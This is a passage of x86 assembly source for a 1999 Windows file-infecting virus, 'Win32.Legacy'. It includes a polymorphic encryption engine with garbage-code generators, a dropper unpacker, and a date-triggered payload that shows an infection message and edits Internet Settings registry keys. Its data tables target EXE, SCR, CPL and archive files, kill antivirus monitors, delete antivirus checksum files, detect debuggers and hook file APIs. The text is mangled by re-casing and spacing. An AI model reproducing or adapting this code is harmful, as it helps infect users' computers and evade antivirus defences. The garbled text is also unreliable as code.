@@ gen_incpointer:
MOV Eax, 5
Call R_Range
XCHG EAX, ECX
JECXZ @@gip _ @@ 2
Dec ECX
JZ @@gip _ @@ 3
Dec ECX
JZ @@gip _ @@ 4
Dec ECX
JNZ @@gip _ @@ 1
JMP @@gip _ @@ 5
@@gip _ @@ 1:
MOV BL, 4; Add Reg_ptr, 4
Call @@ gip_addit
JMP @@ gip_exit
@@gip _ @@ 2:
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@gip _ @@ 2 _ @@ 2
@@gip _ @@ 2 _ @@ 1:
MOV BL, 3; Add Reg_ptr, 3
Call @@ gip_addit
Call @@ gen_garbage
MOV BL, 1; Inc REG_PTR
Call @@gip_incit
JMP @@gip _ @@ 2_exit
@@gip _ @@ 2 _ @@ 2:
MOV BL, 1; Inc REG_PTR
Call @@gip_incit
Call @@ gen_garbage
MOV BL, 3
Call @@ gip_addit; add reg_ptr, 3
@@gip _ @@ 2_exit:
JMP @@ gip_exit
@@gip _ @@ 3:
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@gip _ @@ 3 _ @@ 2
@@gip _ @@ 3 _ @@ 1:
MOV BL, 2; add reg_ptr, 2
Call @@ gip_addit
Call @@ gen_garbage
MOV BL, 2; Inc REG_PTR
Call @@ gip_incit; increg_ptr
JMP @@gip _ @@ 2_exit
@@gip _ @@ 3 _ @@ 2:
MOV BL, 2; Inc REG_PTR
Call @@ gip_incit; increg_ptr
Call @@ gen_garbage
MOV BL, 2; add reg_ptr, 2
Call @@ gip_addit
JMP @@gip _ @@ 2_exit
@@gip _ @@ 4:
MOV Eax, 2
Call R_Range
XCHG EAX, ECX
Jecxz @@gip _ @@ 4 _ @@ 2 @@ gip _ @@ 4 _ @@ 1:
MOV BL, 1; Add Reg_ptr, 1
Call @@ gip_addit; increg_ptr
Call @@ gen_garbage
MOV BL, 3; Inc REG_PTR
Call @@ gip_incit; increg_ptr
JMP @@gip _ @@ 2_exit
@@gip _ @@ 4 _ @@ 2:
MOV BL, 1; Inc REG_PTR
Call @@ gip_incit; increg_ptr
Call @@ gen_garbage
MOV BL, 3; Inc REG_PTR
Call @@ gip_addit; add reg_ptr, 1
JMP @@gip _ @@ 2_exit
@@gip _ @@ 5:; increg_ptr
MOV BL, 4; Inc Reg_ptr
Call @@ gip_incit; increg_ptr
; Increg_ptr
@@ gip_exit:
Or Word PTR [EBP @@ flags], _ IncPointer
RET
@@ gip_addit:
MOV Al, 83H
Stosb
Mov Al, Byte Ptr [EBP @@reg_ptr2data]
OR Al, 11000000B
Stosb
MOV Al, BL
Stosb
RET
@@ gip_incit:
Movzx ECX, BL
MOV Al, 40h
Add Al, Byte PTR [EBP @@reg_ptr2data]
@@ gip_ii_loop:
Stosb
PUSH ECX EAX
Call @@ gen_garbage
POP EAX ECX
Loop @@ gip_ii_loop
RET
Genereate The Code That Will Decrease in One Unit The Counter
@@ gen_deccounter:
Mov Eax, 3
Call R_Range
XCHG EAX, ECX
Jecxz @@gdc _ @@ 2
Dec ECX
JECXZ @@gdc _ @@ 3
@@gdc _ @@ 1:
MOV Al, 83h; Sub Reg_Size, 1
Stosb
MOV Al, Byte PTR [EBP @@reg_counter]
OR Al, 11101000B
Stosb
MOV Al, 1
Stosb
JMP @@gdc_exit
@@gdc _ @@ 2:
MOV Al, 48H; Dec Reg_Size
Add Al, Byte PTR [EBP @@reg_counter]
Stosb
JMP @@gdc_exit
@@gdc _ @@ 3:
MOV Al, 83h; add reg_size, -1
Stosb
MOV Al, Byte PTR [EBP @@reg_counter]
OR Al, 11000000B
Stosb
MOV Al, 0FFH
Stosb
@@gdc_exit: or word PTR [EBP @@ flags], _ Deccounter
RET
Generate the loop-alike thingy
@@ gen_loop:
Mov Eax, 04h
Call R_Range
OR EAX, EAX
JZ @@gl _ @@ 3
Dec EAX
JZ @@gl _ @@ 2
Dec EAX
JZ @@ GL _ @@ 1
@@ GL _ @@ 0:
MOV Al, 83H; Cmp REG_SIZE, 00H
Stosb
Movzx Eax, Byte Ptr [EBP @@reg_counter]
OR Al, 11111000B
Stosb
XOR EAX, EAX
Stosb
JMP @@gl_dojnz
@@ GL _ @@ 1:
MOV Al, 83H; CMP reg_size, -1
Stosb
Movzx Eax, Byte Ptr [EBP @@reg_counter]
OR Al, 11111000B
Stosb
XOR EAX, EAX
Dec EAX
Stosb
MOV EAX, DWORD PTR [EBP @@ size_address]
Dec dword PTR [EAX]
JMP @@gl_dojnz
@@ GL _ @@ 2:
MOV Al, 0BH; or reg_size, reg_size
Stosb
Movzx Eax, Byte Ptr [EBP @@reg_counter]
SHL EAX, 3
OR Al, Byte PTR [EBP @@reg_counter]
OR Al, 11000000B
Stosb
JMP @@gl_dojnz
@@ GL _ @@ 3:
MOV Al, 85H
Stosb
Movzx Eax, Byte Ptr [EBP @@ reg_counter]; test reg_size, reg_size
SHL EAX, 3
OR Al, Byte PTR [EBP @@reg_counter]
OR Al, 11000000B
Stosb
MOV EAX, DWORD PTR [EBP @@ size_address]
Dec dword PTR [EAX]
@@ GL_DOJNZ:
MOV AX, 850FH; JNZ loop_address
Stosw
MOV EAX, DWORD PTR [EBP @@ l00paddress]
Sub Eax, EDI
Sub Eax, 00000004H
Stosd
Or Word PTR [EBP @@ flags], _ loop
RET
; --- Garbage Generator's Table
@@gbgtbl label byte
DD Offset (@@ do_Anything); OH, My Lazy Engine! :)
DD Offset (@@ gen_arithmetic_reg32_reg32)
DD Offset (@@ gen_arithmetic_reg32_imm32)
DD Offset (@@ gen_arithmetic_eax_imm32)
DD offset (@@ gen_mov_reg32_imm32)
DD offset (@@ gen_mov_reg8_imm8)
DD offset (@@ gen_call_to_subroutine)
DD Offset (@@ gen_push_garbage_pop)
DD offset (@@ gen_zer0_reg)
DD Offset (@@ gen_arithmetic_reg32_reg32)
DD Offset (@@ gen_arithmetic_reg32_imm32)
DD Offset (@@ gen_arithmetic_eax_imm32)
DD offset (@@ gen_mov_reg32_imm32)
DD offset (@@ gen_mov_reg8_imm8)
@@ non_mmx_gbg EQU (($ -offset @@ GBGTBL) / 4)
MMX Garbage Generatorz
DD Offset (@@ gen_onebyter); for security, it's here
DD offset (@@ gen_mmx_group1)
DD Offset (@@ gen_mmx_group2)
DD offset (@@ gen_mmx_group3)
DD offset (@@ gen_mmx_movq_mm? _mm?)
DD OFFSET (@@ gen_mmx_movd_mm? _reg32)
@@ s_gbgtbl EQU (($ -offset @@ GBGTBL) / 4)
MMX Version
@@After_looptbl Label Byte
DD offset (@@ gen_passptr2mmx); /
DD Offset (@@ gen_crypt_instruction;> - Must Follow this Order
DD Offset (@@ gen_passmmmx2ptr); /
DD Offset (@@ gen_incpointer_deccounter)
DD Offset (@@ gen_loop)
@@ s_aftlooptbl EQU ($ -offset @@After_LoopTBL) / 4)
Non MMX Version
@@After_l00ptbl label byte
DD offset (@@ gen_non_mmx_crypt_instructions)
DD Offset (@@ gen_incpointer_deccounter)
DD Offset (@@ gen_loop)
@@ s_aftl00ptbl EQU ($ -offset @@After_L00PTBL) / 4)
MMXE_END LABEL BYTE
MMXE ENDP
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =
Random Procedures
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = =: =: =: =: =: =: =: =: =: =: =: =
Random
;
Input:
Nothing.
Output:
EAX = Random Number
;
Random Proc; Thanx Mdriller!;)
Push ECX
MOV EAX, DWORD PTR [EBP RND_SEED1]
Dec DWORD PTR [EBP RND_SEED1]]
XOR EAX, DWORD PTR [EBP RND_SEED2]
MOV ECX, EAX
ROL DWORD PTR [EBP RND_SEED1], CL
Add DWORD PTR [EBP RND_SEED2], EAX
ADC EAX, DWORD PTR [EBP RND_SEED2]
Add Eax, ECX
Ror Eax, Cl
NOT EAX
Sub Eax, 3
XOR DWORD PTR [EBP RND_SEED2], EAX
XOR EAX, DWORD PTR [EBP RND_SEED3]
ROL DWORD PTR [EBP RND_SEED3], 1
Sub DWORD PTR [EBP RND_SEED3], ECX
SBB DWORD PTR [EBP RND_SEED3], 4
INC DWORD PTR [EBP RND_SEED2]
POP ECX
RET
Random ENDP
R_RANGE
;
Input:
EAX = Number of Possible Random Numbers
Output:
EAX = Number Between 0 and (eax-1)
R_RANGE PROC
Push ECX
Push Edx
MOV ECX, EAX
Call Random
XOR EDX, EDX
Div ECX
MOV EAX, EDX
POP EDX
POP ECX
RET
R_RANGE ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Dropper Unpacker (22 Bytes) ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
Even more optimized version of the one in win32.thorin!
;
; ??? ?????????????????????
;?? ?????? ?????? ????? THE LITTLE AND SHITTY COMPRESSION ENGINE
; ????? ??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
; ??????? ??????? ??????? ????????? ????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
;
This is a very simple simple packing engine, based in the repetition of zeros That
The PE Files Have, Thus it is able to compress a pe file ... HEHEHE, I CAN; PUT A Dropper WITHOUT CARING ABOUT ITS SPACE! That Was The Only REASON OF
Make this Little Shit. Maybe One Day I Will Make A 'REAL' Compression Engi-
Ne, But Today I'm TOO BUSY :)
;
Input:
; EDI = Offset Where unpack
ESI = Data To Unpack
ECX = Size of Packed Data
Output:
Nothing.
;
LSCE_UNPACK PROC
Lodsb; 1 Byte Whoa! I'VE
OR Al, Al; 2 Bytes Optimized Some
JNZ Store_Byte; 2 bytes more bytes,
Dec Ecx; 1 byte and super
Dec Ecx; 1 byte helped me with
Lodsw; 2 Bytes One! I've Done
CWDE; 1 byte the rest! :)
Push ECX; 1 Byte
XOR ECX, ECX; 2 Bytes
XCHG EAX, ECX; 1 Byte
Rep stosb; 2 bytes
POP ECX; 1 Byte
Test Al, 00h; 1 Byte
Org $ -1
Store_byte:
Stosb; 1 Byte
Loop lsce_unpack; 2 bytes
Ret; 1 bytes
LSCE_UNPACK ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || [ienc] - Internal Encryptor Engine V1.00 ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
Ienc_encrypt
;
Input:
ESI = Pointer to Ienc Structure
; EDI = Pointer to where Virus Will Be appended
Output:
Nothing
;
Ienc_encrypt Proc
Lodsw
CWDE
XCHG EAX, ECX
Lodsw
CWDE
Add Eax, EDI
XCHG EAX, EDX
Call Random
IENC_ENCL00P:
XOR BYTE PTR [EDX], Al
Inc EDX
Loop Ienc_ENCL00P
CMP Byte PTR [ESI], BILLY_BEL
JNZ Ienc_Encrypt
RET
Ienc_encrypt ENDP
DB 00H, "[Ienc v1.00]", 00h
ic_decrypt
;
Input:
Nothing.
Output:
Nothing.
;
Ienc_Decrypt Proc
Pushad; save all registers
Pushfd; save flag
MOV Eax, [ESP 24h]; EAX = RETURN Address
MOV EBX, [EAX]; EBX = CRC32
MOV ECX, [EAX 04H]; EAX = Size of BlockAdd Eax, 08h; Eax = Ptr To Block
CDQ; EDX = 0
Ienc_l00p:
Pushhad; Preserve All Registers
Push EAX ECX
Ienc_subl00p:
XOR BYTE PTR [EAX], DL; XOR A BYTE
Inc Eax; Point to Next One
Loop Ienc_subl00p; and try it too
POP EDI ESI
Call CRC32; Do The CRC's match?
CMP EAX, EBX
Popad
JZ Ienc_ok; if SO, All IS OK.
Pushhad
Ienc_subl00p2:
XOR BYTE PTR [EAX], DL; Reencrypt: Doesn't Match
INC EAX
Loop Ienc_subl00p2
Popad
Inc EDX; TRY with ANOTHER Key
JMP Ienc_L00P
Ienc_ok:
POPFD; Restore Flags
Popad; Restore Registers
Add DWORD PTR [ESP], 08H; FIX RETURN ADDRESS
Ret; PFFF!
Ienc_Decrypt endp
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Virus payload ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
PayLoad Proc
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK13-Block13
Block13 Label Byte
Lea Eax, [EBP SystemTime]; Get Day, Month, ETC
Push EAX
Apicall_getsystemtime
CMP Word PTR [EBP ST_WMONTH], NMONTH; IS JULY?
JNZ NO_PAYLOAD
CMP Word PTR [EBP ST_WDAY], NDAY; IS 31?
JNZ NO_PAYLOAD
Push 00001000H; Kewl! show copyrightz msgs
Lea EBX, [EBP SZTTL]
Push EBX
LEA EBX, [EBP SZMSG]
Push EBX
Push 00000000H
Apicall_MessageBoxa
Lea Eax, [EBP DISPSITION]; make a little trick for the
Push Eax; Explorer ...
Lea Eax, [EBP Reghandle]
Push EAX
XOR EAX, EAX
Push EAX
Push 000f003fh
Push EAX
Push EAX
Push EAX
Pushs "Software / Microsoft / Windows / Currentversion / Internet Settings / Zones / 0"
PUSH 80000001H
Apicall_RegcreateKeyexa
Push 13D
Call over_ttl
SZTTL DB "[Win32.legacy."
IF Debug
DB "Debug."
ENDIF
VSIZE
DB "v1.00]", 0Over_ttl:
Push 01h
Push 00h
Pushs "displayname"
Push DWORD PTR [EBP Regha]
Apicall_RegSetValueexa
Push DWORD PTR [EBP Regha]
Apicall_closehandle
NO_PAYLOAD:
RET
PayLoad Endp
Szmsg DB "Welcolme to the win32.legacy payload. You are infected by a virus,", 10
DB "I am Your Worst Nightmare ... But BEWARE! YOUR ORGANISM IS ALSO", 10
DB "infected. so go to the doctor and ask him for a cure for this ...", 10, 10
Since here, the message is a bullshit :)
DB "Featuring:", 10
DB 09, "MultiMedia Extensions Engine [mmxe v1.01]", 10
DB 09, "PolymorphiTiot Random Engine [PHIRE V1.00]", 10
DB 09, "Internal Encryptor Technology [Ienc V1.00]", 10
DB 10, "Greetings:", 10
DB 09, "STARZER0 / IKX & INT13H -> Thanx for Information About Archives", 10
DB 09, "Murkry / Ikx -> Thanx for 'Win95 Structures & Secret' Articles", 10
DB 09, "ZAXON / DDT -> Thanx for getting me inTo asm", 10
DB 09, "Benny / 29A -> Thanx for Information About Threads", 10
DB 09, "The Mental Driller / 29A -> Thanx for Polymorphy Ideas", 10
DB 09, "Super / 29A -> Thanx for Optimization Knowledge & Opcode List", 10
DB 09, "Wintermute -> Thanx for Emulation Ideas", 10
DB 09, "YPSILON -> Thanx for NT Information & Cool Ideas", 10
DB 10, "I don't like the drugs ...", 10
DB 09, "But The Drugs Like Me!", 10, 10
DB "(c) 1999 Bilcebu / IKX", 09, 09, "
Eblock13 label byte
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Data ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] [] IF debug
Search_mask DB "Goat ???."
Else
Search_mask db "*."
ENDIF
Extension DD 00000000H
EXTENSIONS_TABLE LABEL BYTE
DB "EXE", 0
DB "SCR", 0
DB "CPL", 0
DB "rar", 0
DB "arj", 0
Nextensions EQU (($ -offset extensions_table) / 4)
Threadstable label byte
DD Offset (thrkillmonitors)
DD Offset (thRANTIDEBUGER)
DD Offset (thrdeletecrc)
DD Offset (THRPERPROCESS)
DD Offset (thrprepareinf)
DD Offset (THRINFECTFILES)
NThreads EQU ($ -offset threadstable) / 4)
Monitors2kill Label Byte
DB "AVP MONITOR", 0
DB "amon Antivirus Monitor", 0
DB Billy_bel
FILES2KILL LABEL BYTE
DB "Anti-vir.dat", 0
DB "chklist.dat", 0
DB "Chklist.taV", 0
DB "chklist.ms", 0
DB "chklist.cps", 0
DB "Avp.crc", 0
DB "ivb.ntz", 0
DB "smartchk.ms", 0
DB "smartchk.cps", 0
DB Billy_bel
Drivers2avoid label byte
DB "//./sice" ,0
DB "//./ntice" ,0
DB Billy_bel
Ienc Structure
; ??????????????
00h size of block
; 02h Offset of Block - Offset of Virus Start
Ienc_struc label byte
DW Offset (EBLOCK1-block1)
DW Offset (Block1-Virus_Start)
DW Offset (EBLOCK2-block2)
DW Offset (Block2-Virus_Start)
DW Offset (EBLOCK3-block3)
DW Offset (Block3-Virus_Start)
DW Offset (EBLOCK4-block4)
DW Offset (Block4-Virus_Start)
DW Offset (EBLOCK5-block5)
DW Offset (Block5-Virus_Start)
DW Offset (eblock6-block6)
DW Offset (Block6-Virus_Start)
DW Offset (EBLOCK7-block7)
DW Offset (Block7-Virus_Start)
DW Offset (EBLOCK8-block8)
DW Offset (Block8-Virus_Start)
DW Offset (EBLOCK9-block9)
DW Offset (Block9-Virus_Start) DW Offset (EBLOCKA-Blocka)
DW Offset (Blocka-Virus_Start)
DW Offset (EBLOCKB-blockB)
DW Offset (Blockb-Virus_Start)
DW Offset (EBLOCKC-Blockc)
DW Offset (Blockc-Virus_Start)
DW Offset (eblockd-blockd)
DW Offset (Blockd-Virus_Start)
DW Offset (EBLOCKE-Blocke)
DW Offset (Blocke-Virus_Start)
DW Offset (EBLOCKF-Blockf)
DW Offset (Blockf-Virus_Start)
DW Offset (EBLOCK10-block10)
DW Offset (Block10-Virus_Start)
DW Offset (EBLOCK11-block11)
DW Offset (Block11-Virus_Start)
DW Offset (EBLOCK12-block12)
DW Offset (Block12-Virus_Start)
DW Offset (EBLOCK13-block13)
DW Offset (Block13-Virus_Start)
N_ienc_blocks EQU (($ -offset Ienc_Stru) / 4)
DB Billy_bel
@@ hookz label byte
; @@ hookz standucture
; ?????????????????
; 00h API CRC32
; 04h Address of the New Handler for That API
; 08h the address of the Original API
DD 02308923FH
DD Offset (Hookmovefilea)
HMOVEFILEA: DD 000000000H
DD 05BD05DB1H
DD Offset (HookcopyFilea)
HcopyFilea: DD 000000000H
DD 08F48B20DH
DD Offset (HookgetFullPathname)
HGETFULLPATHNAMEA: DD 000000000H
DD 0DE256FDEH
DD Offset (HookDeletefilea)
HDeletefilea: DD 000000000H
DD 028452C4FH
DD Offset (Hookwinexec)
Hwinexec: DD 000000000H
DD 0267E0B05H
DD Offset (HookcreateProcessa)
HCREATEPROCESSA: DD 000000000H
DD 08C892DDFH
DD Offset (HookcreateFilea)
HcreateFilea: DD 000000000H
DD 0C633D3DEH
DD Offset (HookGetFileAttributesa)
HGETFILEATTRIBUTESA: DD 000000000H
DD 03C19E536H
DD Offset (HooksetFileAttributesa)
HsetFileAttributesa: DD 000000000H
DD 0f2f886e3h
DD Offset (hook_lopen)
H_Lopen: DD 000000000H
DD 03BE43958H
DD Offset (Hookmovefileexa)
HMOVEFILEEXA: DD 000000000H
DD 0953F2B64H
DD Offset (Hookcopyfileexa) HcopyFileExa: DD 000000000H
DD 068D8FC46H
DD Offset (hookopenfile)
Hopenfile DD 000000000H
DD 0FFC97C1FH
DD Offset (HookgetProcaddress)
HGETPROCADDRESS: DD 000000000H
DD 0AE17EBEFH
DD Offset (Hookfindfirstfilea)
HfindfirstFilea: DD 000000000H
DD 0AA700106H
DD Offset (HookfindNextFilea)
HfindNextFilea: DD 000000000H
NHOOKEDAPIS EQU (($ -offset @@ hookz / 4) / 3)
DB Billy_bel
@@ namezcrc32 label byte
@Findfirstfilea DD 0AE17EBEFH
@FindNextFilea DD 0AA700106H
@FindClose DD 0C200BE21H
@Createfilea DD 08C892DDFH
@Deletefilea DD 0DE256FDEH
@SetFilePointer DD 085859D42H
@SetFileAttributesa DD 03C19E536H
@Closehandle dd 068624a9dh
@Getcurrentdirectorya DD 0eBC6C18BH
@SetcurrentDirectorya DD 0B2DBD7DCH
@Geetwindowsdirectorya DD 0FE248274H
@Getsystemdirectorya DD 0593AE7CEH
@Createfilemappinga DD 096B2D96CH
@MapViewoffile DD 0797B49ECH
@Unmapviewoffile dd 094524b42h
@SetenDoffile dd 059994ed6h
@GetProcaddress DD 0FFC97C1FH
@LoadLibrarya DD 04134D1ADH
@GetsystemTIME DD 075B7EBE8H
@CreateThread DD 019F33607H
@WaitforsingleObject DD 0D4540229H
@Exitthread dd 0058f9201h
@Gettickcount dd 0613fd7bah
@Freelibrary DD 0AFDF191FH
@WriteFile DD 021777793H
@Globalallloc DD 083A353C3H
@Globalfree DD 05CDF6B6AH
@Geetfilesize dd 0ef7d811bh
@Geetfileattributesa DD 0C633D3DEH
@Readfile dd 054d8615ah
@Getcurrentprocess dd 003690e66h
@GetpriorityClass DD 0A7D0D775H
@SetPriorityClass DD 0C38969C7H
DB Billy_bel
@FindWindowa DD 085AB3323H
@PostMessagea DD 086678A04H
@MessageBoxa DD 0D8556CF7H
DB Billy_bel
@RegcreateKeyexa DD 02C822198H @regsetValueexa DD 05B9EC9C6H
DB Billy_bel
; --- Rar Header
Rarheader label byte
RarheaderCrc dw 0000h
Rartype DB 74H
RARFLAGS DW 8000H
Rarheadsize DW SRarheadersize
RARCOMPRESSED DD 00000000H
Raroriginal DD 00000000H
Raros DB 00H
RARCRC32 DD 00000000H
RARFILETIME DW Archive_mark
RARFILEDATE DB 31H, 24h
Rarneedver DB 14h
Rarmethod db 30h
RARFNAMESIZE DW SRARNAMESIZE
RARATTRIB DD 00000000H
Rarname DB "Legacy.exe"
SRARHEADERSIZE EQU ($ -offset rarheader)
SRarNameSize EQU ($ -offset rarname)
; --- arj header
Arjheader Label Byte
Arjsig db 60h, 0eah
Arjheadsiz DW 2ah
Arjhsmsize DB 1eh
Arjver DB 07h
Arjmin db 01h
Arjhost DB 00H
Arjflags DB 10h
ArjMethod DB 00H
Arjfiletype DB 00H
ArjReserved DB "Z"
Arjfiletime DW archive_mark
ArjfileDate DB 031H, 024H
Arjcompress DD 00000000H
ArjORIGINAL DD 00000000H
Arjcrc32 DD 00000000h
ArjentryName DW 0000H
Arjattribute DW 0000H
ArjhostData DW 0000H
SARJHEADER EQU ($ -offset arjheader)
Arjsecondside Label Byte
Arjfilename DB "Legacy.exe", 0
Arjcomment db 00h
SARJCRC32SIZE EQU ($ -offset arjhsmsize)
ArjheaderCrc DD 00000000H
Arjextended dw 0000h
SARJSECONDSIDE EQU ($ -offset arjsecondside)
SARJTALSIZE EQU ($ -offset Arjsig)
ArchiveBuffer DB 50D DUP (00h)
OldBytes DB Plimit DUP (00h)
Newbytes DB Plimit DUP (00h)
K32_DLL DB "kernel32.dll", 0
K32_Size EQU ($ -offset k32_dll)
Kernel DD 00000000H
User32 DD 00000000H
TMPMODULEBASE DD 00000000H
TEMPGA_IT1 DD 00000000H
ImageBase EQU MODBASE
TEMPGA_IT2 DD 00000000H
Infections DD 00000000H
Iobytes DD 02H DUP (00h)
Newsize dd 0000000000h
Infdroppersize DD 00000000H
ArchiveSize DD 00000000H
NumbytesRead DD 00000000H
SearchHandle DD 00000000HfileHandle DD 00000000H
Reghandle DD 00000000H
GlobalAlalochandle DD 00000000H
Globalallochandle2 DD 00000000H
GlobalAllochandle3 DD 00000000H
MapHandle DD 0000000000h
MapAddress DD 00000000H
AddresStableva DD 00000000H
NameTableva DD 00000000H
OrdinalTableva DD 00000000H
LPTHREADID DD 00000000H
Disposition DD 00000000H
WFD_HNDINMEM DD 00000000H
Counter dw 0000h
Wfd_handles_count db 00h
Softice db 00h
--- MMXE Data
Random_seed label byte
RND_SEED1 DD 00000000H
RND_SEED2 DD 00000000H
RND_SEED3 DD 00000000H
DD 00000000h
Registers Used (MMXE & PHIRE)
@@ reg_mask db 00h
@@ reg_key db 00h
@@ reg_counter db 00h
@@ reg_ptr2data db 00h
@@ reg_aux1 EQU $ -1
@@ reg_delta db 00h
@@ reg_aux2 EQU $ -1
@@ mmx_ptr2data db 00h
@@ mmx_key db 00h
@@ it_mmx? db 00h
@@ ptr_data2enc dd 00000000h
@@ ptr_buffer DD 00000000h
@@ size2enc dd 00000000h
@@ size2cryptd4 dd 00000000h
@@Tmp_call DD 00000000H
@@ p_tmp_call EQU $ -4
@@ fix1 dd 00000000h
@@ fix2 DD 00000000H
@@ enc_key dd 00000000h
@@ l00paddress DD 00000000h
@@ size_address DD 00000000h
@@ ptrto2nd dd 00000000h
@@ flags dw 0000h
@@ recursion db 00h
; --- Phire Data
@@ p_distance dd 00000000h
@@p_buffer dd 00000000h
; --- More Virus Data
@@ offsetz label byte
_FindfirstFilea DD 00000000H
_FindNextFilea DD 00000000H
_FindClose DD 00000000H
_CreateFilea DD 00000000H
_Deletefilea DD 00000000H
_SetFilePointer DD 00000000H
_SetFileAttributesa DD 00000000H
_CloseHandle DD 00000000H
_GetcurrentDirectorya DD 00000000H
_SetcurrentDirectorya DD 00000000H_GetWindowsDirectorya DD 00000000H
_GetsystemDirectorya DD 00000000H
_CreateFilemappinga DD 00000000H
_MapViewoffile DD 00000000H
_UnmapViewoffile DD 00000000H
_SETENDOFFILE DD 00000000H
_GetProcaddress DD 00000000H
_LoadLibrarya DD 00000000H
_GetsystemTIME DD 00000000H
_Createthread DD 00000000H
_WaitForsingleObject DD 00000000H
_Exitthread DD 00000000H
_GettickCount DD 00000000H
_Freelibrary DD 00000000H
_WriteFile DD 00000000H
_GlobalAlloc DD 00000000H
_GlobalFree DD 00000000H
_GetfileSize DD 00000000H
_GetfileAttributesa DD 00000000H
_Readfile dd 0000000000h
_GetcurrentProcess DD 00000000H
_GetPriorityClass DD 00000000H
_SETPRIORITYCLASS DD 00000000H
@@ offsetzuser32 label byte
_FindWindowa DD 00000000H
_PostMessagea DD 00000000H
_MessageBoxa DD 00000000H
@@ offsetzadvapi32 label byte
_RegcreateKeyexa DD 00000000H
_RegSetValueexa DD 00000000H
MAX_PATH EQU 260
Filetime Struc
FT_DWLOWDATETIME DD?
FT_DWHIGHDATETIME DD?
Filetime Ends
Win32_find_data label Byte
WFD_DWFILEATTRIBUTES DD?
WFD_FTCREATIONTIME FileTime?
WFD_FTLASTACCESSTIME FileTime?
WFD_FTLASTWRITETIME FILETIME?
WFD_NFILESIGH DD?
WFD_NFILESZELOW DD?
WFD_DWRESERVED0 DD?
WFD_DWRESERVED1 DD?
WFD_SZFILENAME DB MAX_PATH DUP (?)
Wfd_szalternateFileName DB 13 DUP (?)
DB 03 DUP (?)
TMP_SZFILENAME DB MAX_PATH DUP (?)
Directories label byte
WindowsDir DB 7FH DUP (00h)
SystemDir DB 7FH DUP (00h)
Origindir DB 7FH DUP (00h)
DIRS2INF EQU ($ -directories) / 7FH)
MirrorMirror DB DIRS2INF
SystemTime Label Byte
ST_WYEAR DW?
ST_WMONTH DW?
ST_WDAYOFWEEK DW?
ST_WDAY DW?
ST_WHOUR DW?
ST_WMINUTE DW?
ST_WSECOND DW?
ST_WMILLISECONDS DW?
Align DWORD
Virus_end label byte; [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] []
; || 1st generation host ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
;
Nadie Combate La Libertad. A Lo M s, Combate La Libertad de Los Dem s. LA
; Libertad HA EXISTIDO SIEMPRE, Pero Unas Veces Como Privio de Algunos,
Otras VECES COMO Derecho de Todos. (Karl Marx)
Fakehost:
POP DWORD PTR FS: [0]
POP EAX
Popad
Popad
Push 00h; Hiya Vecna! Cocaine Rules!
Push Offset Szmessage; Even ITS 1st Gen Host!;)
IF Debug
Pushs "Win32.legacy.debug # legacy [debug mode] v1.00"
Else
Pushs "Win32.legacy # legacy v1.00"
ENDIF
Push 00h
Call shellabouta
Push 00h
Call EXITPROCESS
End legacy1
; ================================================== ==========================
; || Bonus TRACK ||
; ================================================== ==========================
;
As this Virus is My Favourite One, I Will Put Hery My Favorite Song :)
IT's a song from the last album of blind guardian.com, in the case of the BLIND GUARDIAN (www.blind-guardian.com),
Based in The Book The Silmarill (j.r. tolkien). The album (Called; "Nightfall In The Middle-Earth"), Is The Most Complete (and probably the
Best One) of Blind Guardian. Even the mixers of the album is Very Famous
; in The Metal World: Flemming Rasmussen (See Other B.g. Albums AS "iMagina-
; TIONS from the Other Side ", Also Metallica's" ... and justice for all ", ETC)
PIET SIELCK (Some Songs of B.g. Version's Album "The Forgotten Tales", ALSO
; Vocalist / Producer of His Parallel Project Iron Savior (Albums "Iron Savior"
And "unification"), and productd Also Other Bands as gammaray, etc) and
Charlie Bauerfeind. Well, Here Coms the Song.
;
; - mirror mirror -
;
Far, Far Beyond The Island
WE DWELT The Shades of Twileight
; Through Dread and Weary Days
; Through Grief and Endless Pain
;
IT LIES UNKNOWN
The land of mine
A hidden gate
; To save us from the shadow fall
;
; The Lord of Water Spoke
In the Silence
Words of Wisdom
I've seen the end of all
Be aware, The Storm Gets Closer
;
Chorus:
Mirror Mirror on The Wall
: True Hope Lies Beyond The Coast
You're a damned Kind Can't you see
That The Winds Will Change
Mirror Mirror on The Wall
: True Hope Lies Beyond The Coast
You're a damned Kind Can't you see
; That Tomorrow Bears Insanity
;
Gone's the Wisdom
; Of a thousand years
; A World in Fire and Chains and Fear
Leads me to a place so far
Deep Down It Lies My Secret Vision
I better Keep IT Safe
;
Sall i Leave My Frinds Alone
Hidden in My Twilight Hall
; (I) KNOW the world is lost in fire
